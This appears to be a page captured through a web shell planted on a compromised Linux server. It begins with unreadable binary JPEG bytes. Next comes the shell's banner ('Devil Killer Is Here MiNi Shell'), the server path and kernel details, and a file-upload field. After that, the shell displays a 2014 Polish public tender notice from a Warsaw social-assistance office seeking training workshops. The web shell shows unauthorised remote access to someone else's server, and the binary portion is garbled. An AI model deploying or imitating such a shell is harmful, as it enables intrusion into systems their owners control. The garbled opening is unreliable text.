JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140919/312876-N-2014.html

<p class="kh_header"><b>Warszawa: przeprowadzenie kursów/szkoleń.warsztatów realizowanych w ramach projektu Aktywny Targówek współfinansowanego ze środków Europejskiego Funduszu Społecznego w podziale na 7 części</b><br>
<b>Numer ogłoszenia: 312876 - 2014; data zamieszczenia: 19.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Targówek miasta stołecznego Warszawy , ul. Św. Wincentego 87, 03-291 Warszawa, woj. mazowieckie, tel. 22 277 02 50, faks 22 370 25 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-targowek.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie kursów/szkoleń.warsztatów realizowanych w ramach projektu Aktywny Targówek współfinansowanego ze środków Europejskiego Funduszu Społecznego w podziale na 7 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie kursów/szkoleń/warsztatów dla uczestników Projektu Aktywny Targówek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki finansowanego ze środków Europejskiego Funduszu Społecznego w podziale na 7 części :	
Część nr 1: Warsztat: Zdrowe żywienie dzieci z autyzmem, ADHD, Aspargerem i na diecie bezglutenowej, dla 10 osób (1 grupa - 3 dni po 6 godzin dziennie) łącznie 18 godzin zajęć,
Część nr 2: Warsztat: zdrowego żywienie dzieci na dietach związanych z różnymi rodzajami alergii, dla 11 osób (1 grupa 3 dni po 6 godzin dziennie) łącznie 18 godzin zajęć,
Część nr 3: Kurs komputerowy średnio-zaawansowany , dla 15 osób z podziałem na 2 grupy (każda grupa liczy od 6 do 10 osób) łącznie 40 godzin zajęć(w podziale na 6 dni)
Część nr 4: Szkolenie: komunikacja, asertywność i rozwiązywanie konfliktów dla 12 osób, (1 grupa 2 dni po 6 godzin) łącznie 12 godzin,
Część nr 5: Szkolenie: Etykieta, autoprezentacja i wizerunek jako wsparcie w poszukiwaniu pracy- dla 31 osób z podziałem na 3 grupy (średnio 10-11 osób w grupie- 3 dni po 6 godzin szkolenia x 3 grupy- w sumie 9 dni szkoleniowych) łącznie 54 godziny,
Część nr 6: Szkolenie: jak rozpoznać i radzić sobie z uzależnieniem dzieci (narkotyki, komputery, alkohol) dla 25 osób z podziałem na 2 grupy (w grupie 12-13 osób) łącznie 12 godzin,
Część nr 7: Szkolenie: bezpieczeństwo dzieci w Internecie - dla 15 osób (1 grupa) łącznie 6 godzin..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zadań w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności Zamawiającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że:
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził należycie przynajmniej 1 szkolenie o tematyce zgodnej z tematyką warsztatów lub zbliżonym tematycznie, obejmujące co najmniej 10 godzin zajęć</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony , jeżeli Wykonawca wykaże, że dysponuje osobami posiadającymi kwalifikacje do przeprowadzenia szkoleń będących przedmiotem zamówienia , tj.: posiadały  wykształcenie wyższe magisterskie oraz muszą mieć przygotowanie trenerskie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (załącznik nr 3 do SIWZ). Powyższy warunek dotyczy części I, II, III, IV i V. Wymagania trenerskie nie dotyczą stylisty (w cz. V)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy z art. 22 ust.1ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza do zmiany postanowień umowy w przypadku
1. Nazwy, adresu oraz osób reprezentujących strony;
2.	Każdej zmiany, która jest korzystna lub neutralna dla Zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
3.	Terminów i miejsca, o których mowa w załączniku nr 7 par. 1;
4.	Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
5.	Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-targowek.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej dzielnicy Targówek m. st. Warszawy
ul. Św. Wincentego 87 , 03-291 Warszawa, I piętro pok. 43.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej dzielnicy Targówek m. st. Warszawy
ul. Św. Wincentego 87 , 03-291 Warszawa, I piętro pok. 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Projekt Aktywny Targówek.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztat: zdrowe żywienie dzieci z autyzmem, ADHD, Aspergerem i na diecie bezglutenowej dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 10
ilość grup: 1
ilość godzin warsztatów: 18 (w podziale na 3 dni * 6 godzin).

Warsztaty odbędą się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.

Celem warsztatów  jest nabycie przez osoby biorące udział w Projekcie Aktywny Targówek umiejętności planowania i przygotowywania posiłków dla dzieci z różnymi schorzeniami, tak aby dietą wspierać leczenie.

Program warsztatów powinien zawierać następujące tematy:
-wykład na temat produktów wpływających na nadpobudliwość dzieci
-wykład na temat wpływu żywienia na leczenie różnych schorzeń 
-dobór diety do schorzenia
-planowanie zdrowego i urozmaiconego jadłospisu dla dzieci z różnymi schorzeniami np. ograniczenie cukru w deserach, ograniczenie glutenu itd.)
-planowanie zakupów
-praktyczne ćwiczenia gotowania zdrowych i urozmaiconych potraw dla dzieci w różnymi schorzeniami (co najmniej 80% szkolenia)
Wynajęcie (wyposażonej w stanowiska do nauki gotowania) sali szkoleniowej, zapewnienie produktów i narzędzi do nauki gotowania obiadów oraz serwisu kawowego leży po stronie Wykonawcy. Wspólnie przygotowane w ramach warsztatu posiłki będą degustowane przez uczestników (w ten sposób na szkoleniu zapewniony będzie obiad).
Warsztat powinien składać się co najmniej w 80 % z ćwiczeń praktycznych (wspólnego gotowania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztat: Zdrowe żywienie dzieci  na dietach związanych z różnymi rodzajami alergii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 11
ilość grup: 1
ilość godzin warsztatów: 18 (w podziale na 3 dni * 6 godzin).
Warsztaty odbędą się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem warsztatów  jest nabycie przez osoby biorące udział w Projekcie Aktywny Targówek umiejętności planowania i przygotowywania posiłków dla dzieci z różnymi alergiami, tak aby dietą wspierać leczenie.
Program warsztatów powinien zawierać następujące tematy:
-wykład na temat rodzajów alergii i koniecznych diet z nimi związanych
-stosowanie diety eliminacyjnej
-dobór diety do alergii
-planowanie zdrowego jadłospisu dla dzieci z różnymi alergiami
-planowanie zakupów
-praktyczne ćwiczenia gotowania zdrowych i urozmaiconych potraw dla dzieci 
z różnymi alergiami (co najmniej 80% szkolenia)
Na warsztatach konieczne jest praktyczne pokazanie uczestnikom jak tanio i zdrowo można gotować dla dzieci z różnymi alergiami i jak za pomocą diety wspierać leczenie dziecka.
Wynajęcie (wyposażonej w stanowiska do nauki gotowania) sali szkoleniowej, zapewnienie produktów i narzędzi do nauki gotowania obiadów oraz serwisu kawowego leży po stronie Wykonawcy. Wspólnie przygotowane w ramach warsztatu posiłki będą degustowane przez uczestników (w ten sposób na szkoleniu zapewniony będzie obiad).
Warsztat powinien składać się co najmniej w 80 % z ćwiczeń praktycznych (wspólnego gotowania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs komputerowy średnio-zaawansowany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 15
ilość grup: 2 (od 6 do 10 osób w każdej grupie).
ilość godzin szkolenia: 40 (w podziale na 6 dni).
Kurs odbędzie się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem szkolenia jest zdobycie przez uczestników wiedzy i umiejętności dotyczących: 
-obsługi programu Microsoft Office Word na poziomie średnio zaawansowanym
-obsługi programu Microsoft Office Excel na poziomie średnio zaawansowanym
 -obsługi Internetu na poziomie średnio zaawansowanym
-obsługi programu PowerPoint na poziomie podstawowym
Program szkolenia powinien zawierać minimum następujące tematy:
-obsługi programu Microsoft Office Word na poziomie średniozaawansowanym (minimum 10 godzin)
-obsługi programu Microsoft Office Excel na poziomie średniozaawansowanym (minimum 15 godzin)
-obsługi Internetu na poziomie średniozaawansowanym (minimum 5 godzin)
-obsługi programu PowerPoint na poziomie podstawowym (minimum 10 godzin)
Wynajęcie (wyposażonej w komputery w takiej ilości, jak ilość uczestników) sali szkoleniowej, zapewnienie obiadów oraz serwisu kawowego leży po stronie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie: Komunikacja, asertywność i rozwiązywanie konfliktów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 12
ilość grup: 1
ilość godzin szkolenia: 12 (w podziale na 2 dni * 6 godzin).
Szkolenie odbędzie się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem szkolenia jest rozwój kompetencji społecznych mających służyć uczestnikom w życiu zawodowym oraz prywatnym.
Program szkolenia powinien zawierać następujące tematy:
-Podstawy efektywnego porozumiewania się - zasady skutecznej komunikacji
-Zakłócenia w komunikacji werbalnej i niewerbalnej: rozpoznawanie i usuwanie
-Wytyczanie własnego terytorium psychologicznego 
-Definiowanie praw własnych w relacji z innymi 
-Komunikacja w sytuacjach trudnych
-Rozpoznawanie spirali konfliktu 
-Rozpoznawanie własnych skłonności w sytuacjach konfliktowych 
-Przesuniecie konfliktu z obszaru nierozwiązywalnego na obszar rozwiązywalny 
-Metody rozwiązania konfliktów 
-Tworzenie pozytywnych relacji 
-Techniki asertywnych zachowań (asertywna odmowa, asertywne proszenie, asertywne reagowanie na krytykę itd.)
-Umiejętność przekazywania i przyjmowania informacji zwrotnej 
-Zarządzanie emocjami
Szkolenie musi odbywać się w formule warsztatowej - uczestnicy muszą ćwiczyć zachowania za pomocą scenek, gier, ćwiczeń itd.
Zajęcia odbędą się w sali zapewnionej przez Zamawiającego (ul. Wincentego 87 w Warszawie). Zamawiający zapewni wyposażenie sali w rzutnik multimedialny oraz tablicę. 
Zapewnienie uczestnikom serwisu kawowego (kawa, herbata, soki, ciasteczka oraz naczynia do ich dystrybucji) leży po stronie Wykonawcy. W czasie szkolenia nie jest przewidziany obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie: Etykieta, autoprezentacja i wizerunek jako wsparcie w poszukiwaniu pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 31
ilość grup: 3
ilość godzin szkolenia-54: (3 dni * 6 godzin*3 grupy - w sumie 9 dni szkoleniowych).
Szkolenie odbędzie się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem szkolenia jest rozwój kompetencji społecznych i umiejętności profesjonalnego prezentowania się na rozmowie kwalifikacyjnej i w przyszłej pracy.
Program szkolenia powinien zawierać następujące tematy:
-Bilans umiejętności, możliwości i predyspozycji zawodowych
-Wiedza o rynku pracy
-Tworzenie indywidualnego planu działania
-Wizytówka zawodowa - dokumenty aplikacyjne
-Przygotowanie do rozmowy z pracodawcą (telefonicznej i kwalifikacyjnej)
-Jak zrobić dobre (pierwsze wrażenie)
- Komunikacja interpersonalna podczas rozmowy czyli co i jak mówić
-Komunikacja niewerbalna czyli mowa ciała w trakcie spotkania - postawa, mimika, gesty
-Najczęściej zadawane pytania
-Jak odpowiadać na kłopotliwe pytania
-Prawa kandydata podczas rozmowy - czyli o co pytać Cię nie wolno
-Profesjonalny wizerunek w pracy - zajęcia praktyczne z wizażystą-stylistą
Podczas zajęć stylista-wizażysta musi udzielić każdemu-każdej uczestnikowi/uczestniczce indywidualnych porad jak zadbać o własny wizerunek .
Nadto spotkanie ze stylistą-wizażystą powinno zawierać:
-Pokaz makijaży i fryzur na rozmowę kwalifikacyjną
-Prezentacje i omówienie ubiorów stosowanych do pracy
Szkolenie musi odbywać się w formule warsztatowej - uczestnicy muszą ćwiczyć zachowania za pomocą scenek, gier, ćwiczeń itd.
